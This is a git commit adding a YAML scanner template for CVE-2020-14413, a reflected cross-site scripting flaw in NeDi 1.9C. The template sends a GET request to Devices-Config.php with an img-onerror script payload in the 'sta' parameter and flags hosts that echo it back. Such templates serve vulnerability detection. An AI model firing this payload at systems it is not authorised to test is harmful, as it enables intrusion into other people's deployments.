Create CVE-2020-14413.yaml

patch-1
PikPikcU 2021-03-08 05:28:55 +00:00 committed by GitHub
parent 0d75d24bd9
commit 20dc853b06
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: CVE-2020-14413
info:
name: NeDi 1.9C XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-14413
tags: cve,cve2020,nedi,xss
requests:
- method: GET
path:
- '{{BaseURL}}/Devices-Config.php?sta="><img%20src=x%20onerror=alert(document.domain)>'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
part: body
condition: and
- type: status
status:
- 200